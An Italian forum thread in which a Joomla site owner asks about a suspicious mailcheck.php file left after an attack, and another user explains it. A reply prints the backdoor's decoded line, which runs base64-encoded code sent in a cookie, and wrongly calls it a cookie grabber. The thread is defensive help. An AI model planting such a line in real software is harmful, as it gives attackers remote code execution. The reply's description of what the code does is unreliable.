mailcheck.php???

[tonyan]

dopo aver subito un attacco ho notato nella root del mio sito un file chiamato mailcheck.php con all'interno questo codice
-----------------

Codice: [Seleziona]

<?php eval(base64_decode
cut
?>-----------------

sapete di cosa si tratta? e sopratttutto com'è arrivato li?

[mau_develop]

Allora,..

si chiama cookie grabber,ovvero ti "ruba" i cookies.

I coockies contengono spesso i dati di autenticazione e la sessione quindi sostituendoli ai propri e "presentandosi" al sito in questione permettono l'accesso coi privilegi di chi li possiede.

Questo quello che vuole fare il codice:
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

..ora io non so chi sia il tuo visitatore ma sicuramente o è una macchina o c'è qualcosina che nn va, joomla non ha un coockie PHPSESSIID ... ma PHPSESSID e quindi dubito funzioni, e comunque sia non dovrebbe essere così semplice visto che sei legato oltre che alla sessione a un token.

... un'altro che avrà visto qualche film di matrix ...

M.

[tonyan]

Quello che non capisco è come lo abbiano messo. Non ho configurato l'accesso ftp.

[mau_develop]

non serve l'ftp basta non aver aggiornato joomla o uno dei suoi addons che installi all'ultima versione, o in ultima possibilità, è un problema del server.

M.

ps. quando hai del codice strano che non capisci, molte volte è codificato in base64.
Basta che cerchi con google un "decode base64" e trovi comodissimi tool che eseguono tutto in sandbox evitandoti problemi locali e ti restituiscono il codice in chiaro.

[tonyan]

spero che l'attacco che ho subito derivi dal fatto che non avevo l'ultima versione di joomla installata.

Però anche se la vulnerabilità è del server o del fatto che non ho aggiornato joomla all'ultima versione non capisco come possano crearmi un file nella root senza accesso ftp. Posso capire che mi modifichino index,php e index2.php e alcuni js ... ... ...

[mau_develop]

spero che l'attacco che ho subito derivi dal fatto che non avevo l'ultima versione di joomla installata.
----------------------------------------------------------------
...smetti di sperare... direi che è questo il motivo.

Posso capire che mi modifichino index,php...
non capisco come possano crearmi un file nella root senza accesso ftp
-------------------------------------------
queste due cose che dici contrastano, se modificano vuol dire che hanno o un accesso fisico o sfruttano un funzionamento non previsto.

...comunque in qualsiasi caso modificano.
Adesso, non sto qui a spiegarti il modo, però se invece di quel codice che hai visto fosse stato il codice di un modulino di upload file? sono in ftp?

M.

come fanno è più che semplice